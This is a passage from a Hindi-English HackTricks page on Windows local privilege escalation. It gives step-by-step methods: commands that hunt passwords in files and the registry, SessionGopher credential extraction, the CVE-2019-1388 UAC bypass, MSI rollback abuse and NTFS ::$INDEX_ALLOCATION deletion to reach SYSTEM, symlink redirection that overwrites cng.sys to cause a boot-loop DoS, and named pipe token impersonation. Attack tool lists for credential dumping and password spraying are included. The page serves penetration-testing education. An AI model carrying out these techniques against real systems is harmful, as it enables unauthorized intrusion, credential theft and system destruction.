Component Object Model (COM) Windows ऑपरेटिंग सिस्टम में निर्मित एक तकनीक है जो विभिन्न भाषाओं के सॉफ़्टवेयर कंपोनेंट्स के बीच परस्पर संचार की अनुमति देती है। प्रत्येक COM component एक class ID (CLSID) द्वारा पहचाना जाता है और प्रत्येक component एक या अधिक interfaces के माध्यम से functionality बाहर लाता है, जिनकी पहचान interface IDs (IIDs) द्वारा की जाती है।

COM classes और interfaces रजिस्ट्री में HKEY\CLASSES\ROOT\CLSID और HKEY\CLASSES\ROOT\Interface के अंतर्गत परिभाषित होते हैं। यह रजिस्ट्री HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT को मर्ज करके बनती है।

इस रजिस्ट्री के CLSIDs के अंदर आप child registry InProcServer32 पाएंगे जिसमें एक default value होती है जो एक DLL की ओर इशारा करती है और एक मान होता है जिसका नाम ThreadingModel है जो Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) या Neutral (Thread Neutral) हो सकता है।

बुनियादी तौर पर, यदि आप उन किसी भी DLLs को overwrite कर सकें जो execute होने वाले हैं, तो आप escalate privileges कर सकते हैं यदि वह DLL किसी दूसरे user द्वारा execute किया जाएगा।

यह जानने के लिए कि attackers कैसे COM Hijacking का उपयोग persistence mechanism के रूप में करते हैं, देखें:

COM Hijacking

Generic Password search in files and registry

फ़ाइल सामग्री के लिए खोजें

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

किसी निश्चित फ़ाइलनाम वाली फ़ाइल खोजें

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

registry में कुंजी नामों और पासवर्ड के लिए खोजें

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Tools जो passwords खोजते हैं

MSF-Credentials Plugin एक msf plugin मैंने यह plugin बनाया है ताकि यह victim के अंदर हर स्वतः चलाएगा हर metasploit POST module जो credentials खोजते हैं.\
Winpeas स्वचालित रूप से इस पृष्ठ में उल्लिखित passwords वाले सभी फ़ाइलों को खोजता है.\
Lazagne system से password निकालने के लिए एक और बेहतरीन tool है।

यह tool SessionGopher कई tools के sessions, usernames और passwords खोजता है जो यह data clear text में save करते हैं (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Imagine that SYSTEM के रूप में चलने वाली एक प्रक्रिया एक नया प्रोसेस खोलती है (OpenProcess()) with full access. The same process also create a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Then, if you have full access to the low privileged process, you can grab the open handle to the privileged process created with OpenProcess() and inject a shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).

Named Pipe Client Impersonation

Shared memory segments, जिन्हें अक्सर पाइप कहा जाता है, प्रक्रिया के बीच संचार और डेटा ट्रांसफर की सुविधा देते हैं।

Windows एक फीचर प्रदान करता है जिसे Named Pipes कहा जाता है, जो असंबंधित प्रक्रियाओं को, यहाँ तक कि अलग नेटवर्क्स पर भी, डेटा साझा करने की अनुमति देता है। यह client/server आर्किटेक्चर जैसा होता है, जिसमें भूमिकाएँ named pipe server और named pipe client के रूप में परिभाषित होती हैं।

जब एक client द्वारा किसी पाइप के माध्यम से डेटा भेजा जाता है, तो वह server जिसने पाइप सेटअप किया है, आवश्यक SeImpersonate अधिकार होने पर उस client की identity लेने की क्षमता रखता है। यदि आप किसी privileged process की पहचान करने में सक्षम हैं जो उस पाइप के माध्यम से संचार करता है जिसे आप नकल कर सकते हैं, तो जब वह आपके द्वारा स्थापित पाइप के साथ इंटरैक्ट करे तब उस प्रक्रिया की पहचान अपना कर आप higher privileges हासिल कर सकते हैं। इस तरह के हमले को करने के निर्देशों के लिए उपयोगी गाइड here और here पर मिलते हैं।

Also the following tool allows to intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows to list and see all the pipes to find privescs https://github.com/cyberark/PipeViewer

Telephony tapsrv remote DWORD write to RCE

Telephony service (TapiSrv) server mode में \\pipe\\tapsrv (MS-TRP) एक्सपोज़ करता है। एक remote authenticated client mailslot-based async event path को अभद्र तरीके से उपयोग कर ClientAttach को किसी भी मौजूदा फ़ाइल पर arbitrary 4-byte write में बदल सकता है जो NETWORK SERVICE द्वारा writable हो, फिर Telephony admin rights हासिल करके arbitrary DLL को service के रूप में लोड कर सकता है। पूरा फ़्लो:

• ClientAttach में pszDomainUser को किसी writable existing path पर सेट करें → service उसे CreateFileW(..., OPEN_EXISTING) के माध्यम से खोलती है और async event writes के लिए उसी हैंडल का उपयोग करती है।
• हर event attacker-controlled InitContext को Initialize से उस हैंडल पर लिखता है। एक line app को LRegisterRequestRecipient (Req_Func 61) के साथ register करें, TRequestMakeCall (Req_Func 121) ट्रिगर करें, GetAsyncEvents (Req_Func 0) के माध्यम से फेच करें, फिर unregister/shutdown करके deterministic writes को दोहराएँ।
• खुद को [TapiAdministrators] में C:\Windows\TAPI\tsec.ini जोड़ें, reconnect करें, फिर arbitrary DLL path के साथ GetUIDllName कॉल करें ताकि TSPI_providerUIIdentify को NETWORK SERVICE के रूप में execute किया जा सके।

More details:

Telephony Tapsrv Arbitrary Dword Write To Rce

Misc

File Extensions that could execute stuff in Windows

Check out the page https://filesec.io/

Protocol handler / ShellExecute abuse via Markdown renderers

Clickable Markdown links जिन्हें ShellExecuteExW पर forward किया जाता है वे dangerous URI handlers (file:, ms-appinstaller: या कोई भी registered scheme) ट्रिगर कर सकते हैं और attacker-controlled फ़ाइलों को current user के रूप में execute कर सकते हैं। See:

Protocol Handler Shell Execute Abuse

Monitoring Command Lines for passwords

जब user के रूप में shell मिलता है, तो scheduled tasks या अन्य प्रक्रियाएं चल रही हो सकती हैं जो command line पर credentials पास करती हैं। नीचे दिया गया script हर दो सेकंड में process command lines कैप्चर करता है और वर्तमान स्थिति की तुलना पिछले स्थिति से करता है, और किसी भी फर्क को आउटपुट करता है।

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

प्रोसेसों से पासवर्ड चुराना

Low Priv User से NT\AUTHORITY SYSTEM (CVE-2019-1388) तक / UAC Bypass

यदि आपके पास ग्राफिकल इंटरफ़ेस (console या RDP के माध्यम से) तक पहुँच है और UAC सक्षम है, तो कुछ Microsoft Windows संस्करणों में unprivileged user से “NT\AUTHORITY SYSTEM” जैसे किसी terminal या किसी अन्य process को चलाना संभव है।

यह एक ही कमज़ोरी के साथ privileges escalate करने और UAC को bypass करने दोनों को एक साथ संभव बनाता है। इसके अलावा, किसी भी चीज़ को install करने की आवश्यकता नहीं होती और प्रक्रिया के दौरान उपयोग किया गया binary Microsoft द्वारा हस्ताक्षरित और जारी किया गया होता है।

प्रभावित सिस्टमों में से कुछ निम्नलिखित हैं:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

इस vulnerability को exploit करने के लिए, निम्नलिखित चरणों को पूरा करना आवश्यक है:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

आपके पास निम्न GitHub रिपॉज़िटरी में सभी आवश्यक फाइलें और जानकारी हैं:

https://github.com/jas502n/CVE-2019-1388

Administrator Medium से High Integrity Level / UAC Bypass

इसे पढ़ें ताकि आप Integrity Levels के बारे में सीख सकें:

Integrity Levels

फिर इसे पढ़ें ताकि UAC और UAC bypasses के बारे में जानें:

UAC - User Account Control

Arbitrary Folder Delete/Move/Rename से SYSTEM EoP तक

यह तकनीक मूल रूप से इस ब्लॉग पोस्ट में बताई गई है और एक exploit code यहाँ उपलब्ध है।

अटैक का सार यह है कि Windows Installer की rollback फ़ीचर का दुरुपयोग करके अनइंस्टॉलेशन प्रोसेस के दौरान वैध फाइलों को malicious फ़ाइलों से बदल दिया जाए। इसके लिये attacker को एक malicious MSI installer बनानी होती है जो C:\Config.Msi फ़ोल्डर को hijack करने के लिए उपयोग होगी, जिसे बाद में Windows Installer अन्य MSI पैकेजों के अनइंस्टॉलेशन के दौरान rollback फाइलें स्टोर करने के लिए उपयोग करता है, जहाँ rollback फाइलों को malicious payload के साथ बदला गया होगा।

संक्षेप में तकनीक निम्न है:

1. Stage 1 – Hijack की तैयारी (छोड़ें C:\Config.Msi खाली)

• Step 1: Install the MSI

• एक .msi बनाएं जो एक harmless फ़ाइल (उदा., dummy.txt) को किसी writable फ़ोल्डर (TARGETDIR) में इंस्टॉल करे।

• इंस्टालर को “UAC Compliant” के रूप में मार्क करें, ताकि एक non-admin user इसे चला सके।

• इंस्टाल के बाद फ़ाइल पर एक handle खुला रखें।

• Step 2: Begin Uninstall

• उसी .msi को अनइंस्टॉल करें।

• अनइंस्टॉल प्रक्रिया फाइलों को C:\Config.Msi में स्थानांतरित करके .rbf फाइलों के रूप में rename करना शुरू कर देती है (rollback backups)।

• .rbf होने पर फ़ाइल का पता लगाने के लिए GetFinalPathNameByHandle का उपयोग करके open file handle को poll करें।

• Step 3: Custom Syncing

• .msi में एक custom uninstall action (SyncOnRbfWritten) शामिल होती है जो:

• संकेत देती है जब .rbf लिखा जाता है।

• फिर अनइंस्टॉल जारी रखने से पहले किसी अन्य event पर wait करती है।

• Step 4: Block Deletion of .rbf

• संकेत मिलने पर, .rbf फ़ाइल को FILE_SHARE_DELETE के बिना open करें — यह इसे हटाए जाने से रोकता है।

• फिर uninstall को खत्म करने के लिए signal back करें।

• Windows Installer .rbf को delete नहीं कर पाता, और चूँकि यह सभी contents को delete नहीं कर सकता, C:\Config.Msi हटाया नहीं जाता।

• Step 5: Manually Delete .rbf

• आप (attacker) .rbf फ़ाइल को मैन्युअली delete कर देते हैं।

• अब C:\Config.Msi खाली है, hijack के लिए तैयार।

इस बिंदु पर, SYSTEM-level arbitrary folder delete vulnerability को trigger करें ताकि C:\Config.Msi delete हो जाए।

2. Stage 2 – Replacing Rollback Scripts with Malicious Ones

• Step 6: Recreate C:\Config.Msi with Weak ACLs

• स्वयं C:\Config.Msi फ़ोल्डर को फिर से बनाएं।

• कमजोर DACLs सेट करें (उदा., Everyone:F), और WRITE_DAC के साथ एक handle खुला रखें।

• Step 7: Run Another Install

• उसी .msi को फिर से इंस्टॉल करें, जिसमें:

• TARGETDIR: Writable स्थान।

• ERROROUT: एक variable जो forced failure ट्रिगर करता है।

• यह install फिर से rollback ट्रिगर करने के काम आएगा, जो .rbs और .rbf पढ़ता है।

• Step 8: Monitor for .rbs

• ReadDirectoryChangesW का उपयोग करके C:\Config.Msi पर मॉनिटर करें जब तक कि एक नया .rbs न दिखाई दे।

• उसका filename कैप्चर करें।

• Step 9: Sync Before Rollback

• .msi में एक custom install action (SyncBeforeRollback) शामिल है जो:

• .rbs बनते ही एक event signal करता है।

• फिर जारी रखने से पहले wait करता है।

• Step 10: Reapply Weak ACL

• .rbs created event मिलने पर:

• Windows Installer C:\Config.Msi पर strong ACLs reapply कर देता है।

• लेकिन चूँकि आपके पास WRITE_DAC के साथ अभी भी एक handle है, आप फिर से weak ACLs apply कर सकते हैं।

ACLs केवल handle open पर लागू होते हैं, इसलिए आप अभी भी फ़ोल्डर में लिख सकते हैं।

• Step 11: Drop Fake .rbs and .rbf

• .rbs फ़ाइल को एक fake rollback script से overwrite करें जो Windows को बताती है कि:

• आपकी .rbf फ़ाइल (malicious DLL) को एक privileged location में restore किया जाए (उदा., C:\Program Files\Common Files\microsoft shared\ink\HID.DLL)।

• आपकी fake .rbf को गिराएँ जिसमें malicious SYSTEM-level payload DLL हो।

• Step 12: Trigger the Rollback

• sync event को signal करें ताकि installer resume करे।

• एक type 19 custom action (ErrorOut) को configure किया गया है ताकि install ज्ञात बिंदु पर जान-बूझकर fail हो।

• इससे rollback शुरू हो जाता है।

• Step 13: SYSTEM Installs Your DLL

• Windows Installer:

• आपकी malicious .rbs पढ़ता है।

• आपके .rbf DLL को target location में copy कर देता है।

• अब आपके पास SYSTEM-loaded path में आपकी malicious DLL है।

• Final Step: Execute SYSTEM Code

• किसी trusted auto-elevated binary (उदा., osk.exe) को चलाएँ जो उस DLL को load करता है जिसे आपने hijack किया।

• बूम: आपका कोड SYSTEM के रूप में execute हो जाता है।

Arbitrary File Delete/Move/Rename से SYSTEM EoP तक

मुख्य MSI rollback तकनीक (ऊपर वाली) यह मानती है कि आप एक पूरा फ़ोल्डर (उदा., C:\Config.Msi) delete कर सकते हैं। लेकिन अगर आपकी vulnerability केवल arbitrary file deletion ही अनुमति देती है तो क्या?

आप NTFS internals का दुरुपयोग कर सकते हैं: हर फ़ोल्डर का एक hidden alternate data stream होता है जिसे कहा जाता है:

C:\SomeFolder::$INDEX_ALLOCATION

यह stream फ़ोल्डर का index metadata संग्रहीत करता है।

तो, यदि आप फ़ोल्डर के ::$INDEX_ALLOCATION stream को हटा देते हैं, तो NTFS फ़ाइलसिस्टम से पूरे फ़ोल्डर को हटा देता है।

आप इसे standard file deletion APIs का उपयोग करके कर सकते हैं:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

भले ही आप file delete API को कॉल कर रहे हों, यह फोल्डर को ही डिलीट कर देता है।

Folder की contents को डिलीट करने से SYSTEM EoP तक

क्या होगा अगर आपका primitive आपको arbitrary files/folders डिलीट करने की अनुमति नहीं देता, पर यह attacker-controlled फ़ोल्डर की contents को डिलीट करने की अनुमति देता है?

1. Step 1: एक चारा फ़ोल्डर और फ़ाइल तैयार करें

• बनाएं: C:\temp\folder1
• इसके अंदर: C:\temp\folder1\file1.txt

2. Step 2: file1.txt पर एक oplock रखें

• जब कोई privileged process file1.txt को डिलीट करने की कोशिश करता है तो oplock execution को रोक देता है।

// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();

3. चरण 3: SYSTEM process ट्रिगर करें (उदा., SilentCleanup)

• यह प्रक्रिया फ़ोल्डरों (उदा., %TEMP%) को स्कैन करती है और उनकी सामग्री को हटाने की कोशिश करती है।
• जब यह file1.txt पर पहुँचती है, तो oplock ट्रिगर हो जाता है और नियंत्रण आपके callback को सौंप देता है।

4. चरण 4: oplock callback के अंदर — हटाने को री-डायरेक्ट करें

• विकल्प A: file1.txt को किसी अन्य स्थान पर स्थानांतरित करें

• इससे folder1 खाली हो जाएगा बिना oplock को तोड़े।

• file1.txt को सीधे हटाएँ नहीं — इससे oplock समय से पहले रिलीज़ हो जाएगा।

• विकल्प B: folder1 को junction में बदलें:

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control

• विकल्प C: \RPC Control में एक symlink बनाएं:

# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

यह NTFS आंतरिक स्ट्रीम को लक्षित करता है जो फ़ोल्डर मेटाडेटा संग्रहीत करता है — इसे हटाने से फ़ोल्डर भी हट जाता है।

5. चरण 5: oplock को रिलीज़ करें

• SYSTEM प्रोसेस जारी रहता है और file1.txt को हटाने की कोशिश करता है।
• लेकिन अब, junction + symlink के कारण, यह वास्तव में डिलीट कर रहा है:

C:\Config.Msi::$INDEX_ALLOCATION

परिणाम: C:\Config.Msi को SYSTEM द्वारा हटाया जाता है।

From Arbitrary Folder Create से Permanent DoS तक

ऐसी primitive का लाभ उठाएँ जो आपको SYSTEM/admin के रूप में एक arbitrary फ़ोल्डर बनाने की अनुमति देता है — भले ही आप फ़ाइलें नहीं लिख सकते या कमज़ोर permissions सेट नहीं कर सकते।

एक फ़ोल्डर (not a file) बनाएं जिसका नाम किसी critical Windows driver के समान हो, उदाहरण के लिए:

C:\Windows\System32\cng.sys

• यह पाथ सामान्यतः cng.sys kernel-mode driver से संबंधित होता है।
• यदि आप इसे पहले से एक फ़ोल्डर के रूप में बना देते हैं, तो Windows बूट पर वास्तविक driver को लोड करने में विफल रहता है।
• फिर, Windows बूट के दौरान cng.sys लोड करने का प्रयास करता है।
• यह फ़ोल्डर देखता है, वास्तविक driver को लोड/रिज़ॉल्व करने में असफल रहता है, और क्रैश हो जाता है या बूट रुक जाता है।
• बाहरी हस्तक्षेप के बिना (उदा., boot repair या disk access) कोई fallback नहीं है, और कोई recovery नहीं है।

From privileged log/backup paths + OM symlinks to arbitrary file overwrite / boot DoS

जब कोई विशेषाधिकार प्राप्त सेवा (privileged service) ऐसे पाथ पर logs/exports लिखती है जो किसी लिखने योग्य config से पढ़ा जाता है, तो उस पाथ को Object Manager symlinks + NTFS mount points से रीडायरेक्ट करके विशेषाधिकार वाली लिखाई को मनमाने फ़ाइल ओवरराइट में बदला जा सकता है (यहाँ तक कि बिना SeCreateSymbolicLinkPrivilege के भी)।

आवश्यकताएँ

• लक्ष्य पाथ संग्रहीत करने वाला config attacker द्वारा लिखने योग्य होना चाहिए (उदा., %ProgramData%\...\.ini)।
• \RPC Control पर एक mount point और एक OM फ़ाइल symlink बनाने की क्षमता (James Forshaw symboliclink-testing-tools)।
• वह विशेषाधिकार प्राप्त ऑपरेशन जो उस पाथ पर लिखता हो (log, export, report)।

उदाहरण चेन

1. config पढ़कर विशेषाधिकार प्राप्त log डेस्टिनेशन प्राप्त करें, उदा. SMSLogFile=C:\users\iconics_user\AppData\Local\Temp\logs\log.txt in C:\ProgramData\ICONICS\IcoSetup64.ini।
2. बिना admin के पाथ को रीडायरेक्ट करें:

mkdir C:\users\iconics_user\AppData\Local\Temp\logs
CreateMountPoint C:\users\iconics_user\AppData\Local\Temp\logs \RPC Control
CreateSymlink "\\RPC Control\\log.txt" "\\??\\C:\\Windows\\System32\\cng.sys"

3. प्रिविलेज्ड कंपोनेंट के लॉग को लिखने का इंतजार करें (उदा., एडमिन “send test SMS” ट्रिगर करता है)। अब write C:\Windows\System32\cng.sys में होता है।
4. ओवरराइट किए गए लक्ष्य (hex/PE parser) का निरीक्षण करें ताकि करप्शन की पुष्टि हो; reboot विंडोज़ को टैम्पर्ड driver path लोड करने के लिए मजबूर करता है → boot loop DoS. यह किसी भी protected फ़ाइल पर भी सामान्यीकृत होता है जिसे कोई प्रिविलेज्ड सर्विस write के लिए खोलेगा।

cng.sys सामान्यतः C:\Windows\System32\drivers\cng.sys से लोड होता है, लेकिन अगर C:\Windows\System32\cng.sys में एक कॉपी मौजूद हो तो उसे पहले प्रयत्न किया जा सकता है, जिससे यह corrupt डेटा के लिए एक विश्वसनीय DoS sink बन जाता है।

High Integrity से System तक

नया service

यदि आप पहले से ही High Integrity process पर चल रहे हैं, तो SYSTEM तक का path सरल हो सकता है सिर्फ एक नया service बनाकर और उसे execute करके:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

Tip

जब service binary बना रहे हों तो सुनिश्चित करें कि वह एक वैध service हो या binary आवश्यक क्रियाएँ इतनी तेज़ी से पूरा करे क्योंकि अगर यह वैध service नहीं होगा तो इसे 20s में बंद कर दिया जाएगा।

AlwaysInstallElevated

High Integrity process से आप AlwaysInstallElevated रजिस्ट्री एंट्रीज़ को सक्षम करने और एक reverse shell को .msi wrapper के माध्यम से install करने की कोशिश कर सकते हैं।
More information about the registry keys involved and how to install a .msi package here.

High + SeImpersonate privilege to System

You can find the code here.

From SeDebug + SeImpersonate to Full Token privileges

यदि आपके पास वे token privileges हैं (संभवतः आप इन्हें पहले से किसी High Integrity process में पाएँगे), तो आप SeDebug privilege के साथ लगभग किसी भी process (protected processes को छोड़कर) को open कर पाएँगे, उस process का token copy कर पाएँगे, और उस token के साथ एक arbitrary process बना पाएँगे।
इस तकनीक का उपयोग आमतौर पर SYSTEM के रूप में चल रहे किसी ऐसे process को चुनने के लिए किया जाता है जिसके पास सभी token privileges हों (हाँ, आप SYSTEM processes पा सकते हैं जिनके पास सभी token privileges नहीं होते).
You can find an example of code executing the proposed technique here.

Named Pipes

यह तकनीक meterpreter द्वारा getsystem में escalate करने के लिए उपयोग की जाती है। तकनीक यह है कि एक pipe बनाया जाता है और फिर एक service बनाया/abuse किया जाता है ताकि वह pipe पर लिख सके। तब वह server जिसने pipe बनाया है और जिसके पास SeImpersonate privilege है, pipe client (service) के token को impersonate कर सकेगा और SYSTEM privileges प्राप्त कर लेगा।
यदि आप name pipes के बारे में और जानना चाहें तो यह पढ़ें.
यदि आप यह पढ़ना चाहें कि high integrity से System तक name pipes का उपयोग करके कैसे पहुँचना है तो यह पढ़ें.

Dll Hijacking

यदि आप किसी SYSTEM के रूप में चल रहे process द्वारा लोड की जा रही dll को hijack करने में सफल हो जाते हैं तो आप उन permissions के साथ arbitrary code execute कर पाएँगे। इसलिए Dll Hijacking इस प्रकार की privilege escalation के लिए भी उपयोगी है, और ऊपर से देखा जाए तो high integrity process से इसे हासिल करना बहुत ही आसान होता है क्योंकि वहाँ dlls लोड करने वाले फ़ोल्डरों पर उसे write permissions मिलती हैं।
You can learn more about Dll hijacking here.

From Administrator or Network Service to System

• https://github.com/sailay1996/RpcSsImpersonator
• https://decoder.cloud/2020/05/04/from-network-service-to-system/
• https://github.com/decoder-it/NetworkServiceExploit

From LOCAL SERVICE or NETWORK SERVICE to full privs

Read: https://github.com/itm4n/FullPowers

More help

Static impacket binaries

Useful tools

Windows local privilege escalation vectors देखने के लिए सबसे अच्छा टूल: WinPEAS

PS

PrivescCheck
PowerSploit-Privesc(PowerUP) – misconfigurations और संवेदनशील फ़ाइलों की जाँच करें (check here). Detected.
JAWS – कुछ संभावित misconfigurations की जाँच और जानकारी इकट्ठा करने के लिए (check here).
privesc – misconfigurations की जाँच
SessionGopher – यह PuTTY, WinSCP, SuperPuTTY, FileZilla, और RDP saved session जानकारी निकालता है। लोकल में -Thorough का उपयोग करें।
Invoke-WCMDump – Credential Manager से credentials निकालता है। Detected.
DomainPasswordSpray – इकट्ठा किए गए पासवर्ड्स को डोमेन पर spray करें
Inveigh – Inveigh एक PowerShell ADIDNS/LLMNR/mDNS spoofer और man-in-the-middle टूल है।
WindowsEnum – बुनियादी privesc Windows enumeration
Sherlock ~~~~ – ज्ञात privesc कमजोरियों की खोज (DEPRECATED for Watson)
WINspect – लोकल चेक्स (Admin rights की ज़रूरत)

Exe

Watson – ज्ञात privesc कमजोरियों की खोज (VisualStudio का उपयोग करके compile करने की आवश्यकता) (precompiled)
SeatBelt – misconfigurations की तलाश करते हुए host को enumerate करता है (ज़्यादा एक information gathering टूल है न कि सिर्फ privesc) (compile करने की आवश्यकता) (precompiled)
LaZagne – कई सॉफ़्टवेयर्स से credentials निकालता है (github में precompiled exe मौजूद है)
SharpUP – PowerUp का C# पोर्ट
Beroot ~~~~ – misconfiguration की जाँच (exe github में precompiled)। अनुशंसित नहीं। यह Win10 पर अच्छी तरह काम नहीं करता।
Windows-Privesc-Check – संभावित misconfigurations की जाँच (python से exe)। अनुशंसित नहीं। यह Win10 पर अच्छी तरह काम नहीं करता।

Bat

winPEASbat – यह पोस्ट आधारित टूल है (properly काम करने के लिए accesschk की ज़रूरत नहीं होती पर यह उसका उपयोग कर सकता है)।

Local

Windows-Exploit-Suggester – systeminfo के आउटपुट को पढ़कर काम करने वाले exploits सुझाता है (local python)
Windows Exploit Suggester Next Generation – systeminfo के आउटपुट को पढ़कर काम करने वाले exploits सुझाता है (local python)

Meterpreter

multi/recon/local_exploit_suggestor

प्रोजेक्ट को सही .NET संस्करण का उपयोग करके compile करना होगा (see this). पीड़ित होस्ट पर इंस्टॉल किए गए .NET संस्करण को देखने के लिए आप कर सकते हैं:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

संदर्भ

• http://www.fuzzysecurity.com/tutorials/16.html

• http://www.greyhathacker.net/?p=738

• http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html

• https://github.com/sagishahar/lpeworkshop

• https://www.youtube.com/watch?v=_8xJaaQlpBo

• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

• https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

• https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md

• https://github.com/frizb/Windows-Privilege-Escalation

• https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

• https://github.com/frizb/Windows-Privilege-Escalation

• http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus–detections

• 0xdf – HTB/VulnLab JobTwo: Word VBA macro phishing SMTP के माध्यम से → hMailServer credential decryption → Veeam CVE-2023-27532 SYSTEM तक

• HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft

• Check Point Research – Chasing the Silver Fox: Kernel Shadows में Cat & Mouse

• Unit 42 – SCADA System में मौजूद Privileged File System Vulnerability

• Symbolic Link Testing Tools – CreateSymlink उपयोग

• A Link to the Past. Windows पर Symbolic Links का दुरुपयोग

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

• सदस्यता योजनाओं की जांच करें!
• हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
• हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।